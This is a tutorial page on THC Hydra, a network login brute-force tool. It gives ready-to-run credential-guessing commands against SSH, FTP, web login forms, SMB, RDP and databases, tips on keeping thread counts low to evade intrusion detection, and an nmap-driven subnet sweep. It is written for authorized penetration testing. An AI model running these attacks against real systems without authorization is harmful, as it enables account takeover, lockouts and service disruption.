Terminal GuideTerminal Guide

THC Hydra: Network Login Brute Force Guide

THC Hydra is one of the most widely used network login brute force tools in security testing. It supports over 50 protocols and services, making it indispensable for penetration testers and security auditors who need to evaluate authentication strength across network infrastructure.

20 min readLast updated: February 20, 2026
Dai Aoki

Dai Aoki

CEO at init, Inc. / CTO at US & JP startups / Creator of WebTerm

Ethical and Legal Disclaimer
THC Hydra is a powerful brute force tool intended exclusively for authorized security testing and educational purposes. Using this tool against systems without explicit written permission is illegal in most jurisdictions and may violate laws such as the Computer Fraud and Abuse Act (CFAA), the UK Computer Misuse Act, and similar legislation worldwide. Always obtain proper authorization before testing any system. The authors of this guide are not responsible for any misuse of this tool.

Quick Reference

Basic Attacks

hydra -l user -P pass.txt ssh://targetSSH brute force
hydra -l user -P pass.txt ftp://targetFTP brute force
hydra -L users.txt -P pass.txt target sshMultiple users

HTTP Attacks

hydra -l admin -P pass.txt target http-get /pathHTTP GET auth
hydra -l admin -P pass.txt target http-post-form "..."HTTP POST form
hydra -l admin -P pass.txt target https-get /pathHTTPS GET auth

Options

-t 16Set 16 parallel tasks
-s 2222Custom port number
-o results.txtOutput to file

Session Control

-RRestore previous session
-e nsrTry null/same/reverse passwords
-VShow each login attempt

Database Attacks

hydra -l root -P pass.txt target mysqlMySQL brute force
hydra -l postgres -P pass.txt target postgresPostgreSQL brute force
hydra -l sa -P pass.txt target mssqlMSSQL brute force

Downloadable Image Preview

Failed to generate preview

Overview

THC Hydra (commonly referred to as just "Hydra") is an open-source, parallelized login cracker developed by The Hacker's Choice (THC). It performs rapid dictionary attacks and brute force attacks against remote authentication services. Hydra is designed to be fast, flexible, and easy to extend with new modules.

Hydra supports a wide range of protocols including SSH, FTP, HTTP, HTTPS, SMB, LDAP, MySQL, PostgreSQL, MSSQL, RDP, VNC, Telnet, SMTP, POP3, IMAP, and many more. Its parallelized architecture allows it to test multiple credentials simultaneously, significantly reducing the time needed for comprehensive authentication audits.

Key capabilities of THC Hydra include:

  • Support for over 50 protocols and services
  • Parallelized connections for high-speed testing
  • Flexible input via user/password lists or single credentials
  • Session restore functionality for interrupted attacks
  • IPv6 support for modern network environments
  • Modular design allowing easy protocol additions
  • HTTP/HTTPS form-based authentication attacks
  • Proxy and SOCKS support for network routing

Installation

THC Hydra is available through most Linux package managers and can also be compiled from source for the latest features and protocol support.

Install on Debian/Ubuntu

bash
# Install from official repositories
sudo apt update
sudo apt install hydra

# Verify installation
hydra -h

On Kali Linux and other penetration testing distributions, Hydra is typically pre-installed.

Install on macOS

bash
# Install using Homebrew
brew install hydra

# Verify installation
hydra -h

Install from Source

Building from source gives you the latest version with all protocol modules. You will need development libraries for the protocols you wish to support.

bash
# Install build dependencies (Debian/Ubuntu)
sudo apt install build-essential libssl-dev libssh-dev \
  libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev \
  libpq-dev libsvn-dev firebird-dev libmemcached-dev

# Clone the repository
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra

# Configure and build
./configure
make
sudo make install

# Verify installation
hydra -h
Tip
When building from source, the configure script will report which optional modules are available based on your installed libraries. Install the relevant development packages before running configure to enable all desired protocol modules.

Basic Usage

Command Syntax

Hydra follows a consistent command-line syntax for all supported protocols. The general format is:

bash
hydra [options] target protocol

# Or using the URL-style syntax:
hydra [options] protocol://target[:port]

The most common options define the username(s) and password(s) to test:

bash
# Single username, password list
hydra -l username -P /path/to/passwords.txt target protocol

# Username list, single password
hydra -L /path/to/users.txt -p password target protocol

# Both username and password lists
hydra -L /path/to/users.txt -P /path/to/passwords.txt target protocol

Single Target Attack

The simplest form of a Hydra attack targets a single host with a known username and a password list:

bash
# Basic SSH brute force with verbose output
hydra -l admin -P /usr/share/wordlists/rockyou.txt -V 192.168.1.100 ssh

# FTP brute force on a custom port
hydra -l ftpuser -P passwords.txt -s 2121 192.168.1.100 ftp

# Using URL-style syntax
hydra -l admin -P passwords.txt ssh://192.168.1.100:22
Info
The -V flag enables verbose mode, showing each login attempt in real time. This is useful during testing to monitor progress, but it slows down the attack due to the additional output overhead.

Protocol-Specific Attacks

Hydra shines in its broad protocol support. Each protocol module is optimized for the specific authentication mechanism of the target service. Below are the most commonly used protocol attack examples.

SSH Brute Force

SSH is one of the most frequently tested services. Hydra handles both password and keyboard-interactive authentication methods.

bash
# Basic SSH attack
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh

# SSH with custom port and threading
hydra -l admin -P passwords.txt -s 2222 -t 4 192.168.1.100 ssh

# SSH with multiple usernames and additional checks
hydra -L users.txt -P passwords.txt -e nsr 192.168.1.100 ssh

# Try null password (n), same as login (s), reversed login (r)
hydra -l admin -P passwords.txt -e nsr ssh://192.168.1.100
Tip
SSH servers often have rate limiting or fail2ban configured. Keep the thread count low (e.g., -t 4) to avoid triggering account lockouts or IP bans during authorized testing.

FTP Brute Force

bash
# Basic FTP attack
hydra -l ftpuser -P passwords.txt 192.168.1.100 ftp

# FTP with anonymous login check
hydra -l anonymous -P passwords.txt 192.168.1.100 ftp

# FTP over TLS/SSL
hydra -l admin -P passwords.txt 192.168.1.100 ftps

HTTP Form Attack

HTTP form attacks are among the most powerful Hydra capabilities. They target web login pages by submitting POST or GET requests with credential parameters. You must identify the form fields and the failure/success condition.

bash
# HTTP POST form attack
# Syntax: http-post-form "path:parameters:failure_string"
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid credentials"

# HTTPS POST form attack
hydra -l admin -P passwords.txt 192.168.1.100 https-post-form \
  "/login:username=^USER^&password=^PASS^:F=Login failed"

# HTTP POST form with cookie
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:username=^USER^&password=^PASS^:F=incorrect:H=Cookie: PHPSESSID=abc123"

# Success-based detection (S= instead of F=)
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:user=^USER^&pass=^PASS^:S=Welcome"

In the form string, ^USER^ and ^PASS^ are placeholder tokens that Hydra replaces with the current username and password being tested. The F= prefix indicates a failure string (present on failed logins), while S= indicates a success string (present only on successful logins). The H= prefix allows you to add custom HTTP headers.

HTTP GET Basic Auth

For services protected by HTTP Basic or Digest authentication:

bash
# HTTP Basic Authentication
hydra -l admin -P passwords.txt 192.168.1.100 http-get /admin/

# HTTPS Basic Authentication on custom port
hydra -l admin -P passwords.txt -s 8443 192.168.1.100 https-get /secure/

# HTTP Digest Authentication (auto-detected)
hydra -l admin -P passwords.txt 192.168.1.100 http-get /protected/

SMB Brute Force

bash
# SMB/Windows authentication attack
hydra -l administrator -P passwords.txt 192.168.1.100 smb

# SMB with domain specification
hydra -l admin -P passwords.txt -m "WORKGROUP" 192.168.1.100 smb

# SMB version 2/3
hydra -l admin -P passwords.txt 192.168.1.100 smbnt

RDP Brute Force

bash
# RDP brute force (Remote Desktop Protocol)
hydra -l administrator -P passwords.txt 192.168.1.100 rdp

# RDP with domain
hydra -l admin -P passwords.txt -m "DOMAIN" 192.168.1.100 rdp

# RDP on custom port
hydra -l admin -P passwords.txt -s 3390 192.168.1.100 rdp
Warning
RDP brute force attacks are slow by nature due to the protocol handshake overhead. Windows also implements account lockout policies by default. Always check the lockout policy before running RDP attacks to avoid locking out user accounts during a test.

MySQL Brute Force

bash
# MySQL authentication attack
hydra -l root -P passwords.txt 192.168.1.100 mysql

# MySQL on custom port
hydra -l dbadmin -P passwords.txt -s 3307 192.168.1.100 mysql

# MySQL with multiple usernames
hydra -L db_users.txt -P passwords.txt 192.168.1.100 mysql

PostgreSQL Brute Force

bash
# PostgreSQL authentication attack
hydra -l postgres -P passwords.txt 192.168.1.100 postgres

# Specify a target database
hydra -l postgres -P passwords.txt 192.168.1.100 postgres -m "targetdb"

# PostgreSQL on custom port
hydra -l dbuser -P passwords.txt -s 5433 192.168.1.100 postgres

Advanced Options

Password Lists and Wordlists

The effectiveness of a brute force attack depends heavily on the quality of the wordlist. Hydra works with any plain text file containing one password per line. Several well-known wordlists are commonly used in security testing.

bash
# Using the classic rockyou wordlist (Kali Linux)
hydra -l admin -P /usr/share/wordlists/rockyou.txt target ssh

# Generate a custom wordlist with crunch and pipe to Hydra
crunch 6 8 abcdefghijklmnopqrstuvwxyz0123456789 | hydra -l admin -P - target ssh

# Use a colon-separated file of user:password pairs
hydra -C /path/to/credentials.txt target ssh

# Password list with specific character set attempts
# -x MIN:MAX:CHARSET generates passwords on the fly
hydra -l admin -x 4:6:aA1 192.168.1.100 ssh

The -x option generates passwords dynamically. The format is MIN:MAX:CHARSET where charset specifiers include:a for lowercase, A for uppercase, 1 for digits, and literal characters for special symbols.

Info
The -C option accepts a colon-separated file in username:password format. This is useful when you have pre-built credential pairs from data breach analysis or prior reconnaissance.

Threading and Performance

Hydra runs multiple parallel connections to speed up testing. The default is 16 tasks (threads), but this can be tuned based on the target service and network conditions.

bash
# Set parallel tasks to 64
hydra -l admin -P passwords.txt -t 64 192.168.1.100 ftp

# Reduce threads for rate-limited services
hydra -l admin -P passwords.txt -t 4 192.168.1.100 ssh

# Set connection timeout (seconds)
hydra -l admin -P passwords.txt -w 10 192.168.1.100 ssh

# Set wait time between connections per thread (seconds)
hydra -l admin -P passwords.txt -W 3 192.168.1.100 ssh

# Limit total number of attempts
hydra -l admin -P passwords.txt -t 4 -W 2 192.168.1.100 ssh
Tip
For SSH and RDP, keep thread counts low (4-8) to avoid triggering intrusion detection systems. For FTP and HTTP services, you can safely increase threads to 32-64 for faster testing.

Restore and Session Management

Hydra automatically saves session state so interrupted attacks can be resumed. This is critical when running long attacks with large wordlists.

bash
# Restore a previously interrupted session
hydra -R

# Session files are saved as hydra.restore in the current directory
# Check session info
cat hydra.restore

# Output results to a file
hydra -l admin -P passwords.txt -o results.txt 192.168.1.100 ssh

# Output in JSON format
hydra -l admin -P passwords.txt -o results.json -b json 192.168.1.100 ssh

# Stop after finding the first valid credential pair
hydra -l admin -P passwords.txt -f 192.168.1.100 ssh

# Stop after first pair found on ANY host (with -M target list)
hydra -L users.txt -P passwords.txt -F -M targets.txt ssh

Practical Examples

Testing SSH Authentication Strength

A comprehensive SSH authentication audit tests multiple accounts with well-known weak passwords. This example shows a typical authorized penetration test scenario.

bash
# Create a targeted user list
cat > users.txt << 'EOF'
root
admin
administrator
ubuntu
deploy
git
jenkins
ansible
EOF

# Run SSH audit with safe settings
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt \
  -t 4 -e nsr -o ssh_results.txt -V 192.168.1.100 ssh

# The -e nsr flag also tests:
#   n = null/empty password
#   s = username as password
#   r = reversed username as password

# Review results
cat ssh_results.txt

Web Login Form Brute Force

Testing web application login forms requires inspecting the HTML to identify form fields, the submission endpoint, and the response that indicates a failed login. Use your browser's developer tools to gather this information.

bash
# Step 1: Identify form parameters using curl or browser DevTools
# Look for: form action URL, input field names, failure message

# Step 2: Construct the Hydra command
# Example for a WordPress login page
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username"

# Example for a custom PHP login page
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login.php:username=^USER^&password=^PASS^:F=Login failed"

# Example with CSRF token handling (use Burp Suite or custom scripts for CSRF)
# Hydra does not natively handle CSRF tokens, so for forms with CSRF
# protection, consider pairing Hydra with tools like Burp Suite Intruder

# HTTPS form with custom header
hydra -l admin -P passwords.txt 192.168.1.100 https-post-form \
  "/api/login:user=^USER^&pass=^PASS^:F=unauthorized:H=Content-Type: application/x-www-form-urlencoded"
Info
To determine the correct failure string, attempt a manual login with invalid credentials and note the response message. Use a unique portion of that message as the failure condition after the F= prefix.

Network Service Audit

Auditing multiple services across a network requires scanning for open ports first, then systematically testing each discovered service with appropriate credentials.

bash
# Step 1: Scan for open services with nmap
nmap -sV -p 21,22,80,443,445,3306,3389,5432 192.168.1.0/24 -oG services.txt

# Step 2: Create a target list for Hydra
# Extract hosts with SSH open
grep "22/open" services.txt | awk '{print $2}' > ssh_targets.txt

# Step 3: Run Hydra against multiple targets
hydra -L users.txt -P passwords.txt -M ssh_targets.txt -t 4 -o audit_results.txt ssh

# Step 4: Test FTP services on discovered hosts
grep "21/open" services.txt | awk '{print $2}' > ftp_targets.txt
hydra -L users.txt -P passwords.txt -M ftp_targets.txt -t 8 -o ftp_results.txt ftp

# Step 5: Test MySQL services
grep "3306/open" services.txt | awk '{print $2}' > mysql_targets.txt
hydra -l root -P passwords.txt -M mysql_targets.txt -t 4 -o mysql_results.txt mysql

# Compile all results
cat *_results.txt > full_audit_report.txt

Options Reference

The following table provides a comprehensive reference for the most important Hydra command-line options.

Hydra Options Reference

OptionDescription
-l LOGINUse a single login name
-L FILELoad login names from a file
-p PASSUse a single password
-P FILELoad passwords from a file
-C FILEUse colon-separated user:pass format file
-x MIN:MAX:CHARSETGenerate passwords (a=lower, A=upper, 1=digits)
-e nsrTry null password (n), same as login (s), reversed (r)
-t TASKSNumber of parallel connections (default: 16)
-s PORTUse custom port number
-o FILEWrite found credentials to file
-b FORMATOutput format: text (default), json, jsonv1
-fStop after first valid pair found on host
-FStop after first valid pair found on any host
-M FILELoad target list from file (one per line)
-w TIMEConnection timeout in seconds (default: 32)
-W TIMEWait time between connections per thread
-VVerbose mode - show each login attempt
-vVerbose mode - show additional info
-dDebug mode - show full protocol details
-RRestore a previously aborted session
-SUse SSL for the connection
-OUse old SSL v2/v3 (not TLS)
-4 / -6Force IPv4 or IPv6 addresses
-m MODULE_OPTPass module-specific options
-UShow module usage details for a protocol

To see module-specific help for any protocol, use:

bash
# Show help for a specific module
hydra -U http-post-form
hydra -U ssh
hydra -U smb

# List all supported protocols
hydra -h | grep "Supported services"

Tips and Best Practices

Following best practices ensures that your brute force testing is effective, safe, and legally compliant. These guidelines apply to authorized penetration testing engagements.

  • Always have written authorization. Before running Hydra against any target, ensure you have a signed penetration testing agreement or scope document that explicitly permits brute force testing.
  • Start with low thread counts. Use -t 4 initially, especially for SSH and RDP. Increase gradually only if the target service can handle it without triggering lockouts.
  • Use targeted wordlists. Generic wordlists like rockyou.txt are a good starting point, but custom wordlists tailored to the target organization yield better results. Tools like CeWL can generate wordlists from website content.
  • Check account lockout policies. Before running attacks, verify the target's lockout thresholds. Accidentally locking out production accounts during a test can cause significant business disruption.
  • Use the -e nsr flag. This tests null passwords, username-as-password, and reversed username, which catches many common misconfigurations with minimal additional time.
  • Save results with -o. Always output results to a file for documentation. Use JSON format (-b json) for easier post-processing and reporting.
  • Use -f to stop early. In most penetration tests, finding one valid credential per service is sufficient to prove the vulnerability. The -f flag stops Hydra after the first successful login.
  • Combine with nmap for reconnaissance. Use nmap to identify open services before running Hydra. This avoids wasting time on closed ports and ensures you test all discovered services.
  • Monitor network impact. Brute force attacks generate significant traffic. Coordinate with the network team to ensure your testing does not impact production services or trigger false positives in monitoring systems.
  • Document everything. Record your commands, target scope, timing, and results. Thorough documentation is essential for professional penetration testing reports and legal compliance.
Danger
Never run Hydra against production systems during business hours without explicit coordination with the system owners. Brute force attacks can cause performance degradation, account lockouts, and alert fatigue for security operations teams.

Related Tools

THC Hydra is often used alongside other security tools for comprehensive penetration testing. Understanding when to use each tool helps you build an efficient testing workflow.

  • Hashcat / John the Ripper -- Offline password cracking tools. While Hydra attacks live network services, Hashcat and John work on captured password hashes. Use them when you have obtained password hash files from a compromised system.
  • Nmap -- Network scanner for reconnaissance. Run nmap first to discover open ports and services, then use Hydra to test the authentication strength of discovered services.
  • Medusa -- Another parallel login brute forcer similar to Hydra. Medusa uses a modular design with a slightly different syntax. It can be used as an alternative when Hydra has issues with specific protocols.
  • Ncrack -- Developed by the Nmap project, Ncrack is designed for high-speed network authentication cracking. It supports fewer protocols than Hydra but offers deep integration with Nmap output formats.
  • Burp Suite -- For web application testing, Burp Suite's Intruder module handles complex scenarios that Hydra cannot, such as CSRF token handling, multi-step authentication, and session-based attacks.
  • Metasploit Framework -- Includes brute force modules (e.g.,auxiliary/scanner/ssh/ssh_login) that integrate with the broader exploitation workflow. Use Metasploit when you need to chain authentication attacks with post-exploitation activities.
  • CeWL -- Custom word list generator that crawls a target website and builds a wordlist from the site content. Pair CeWL-generated wordlists with Hydra for targeted brute force attacks specific to the organization.

Official Documentation

For authoritative information, refer to the official documentation:

Related Articles

Hashcat: Advanced Password Recovery Guide

Master Hashcat for GPU-accelerated password recovery. Learn attack modes, hash types, rule-based attacks, and optimization techniques.

linux25 min read

John the Ripper: Password Cracker Guide

Master John the Ripper for password security testing. Learn cracking modes, custom rules, wordlist optimization, and hash format support.

linux22 min read

Nmap: Network Scanner & Security Auditing Tool Guide

Comprehensive guide to Nmap for network discovery and security auditing. Learn port scanning, OS detection, NSE scripts, and practical penetration testing workflows.

linux25 min read

Metasploit Framework: Penetration Testing Guide

Complete guide to the Metasploit Framework for penetration testing. Learn msfconsole, exploit modules, payloads, and post-exploitation techniques.

linux28 min read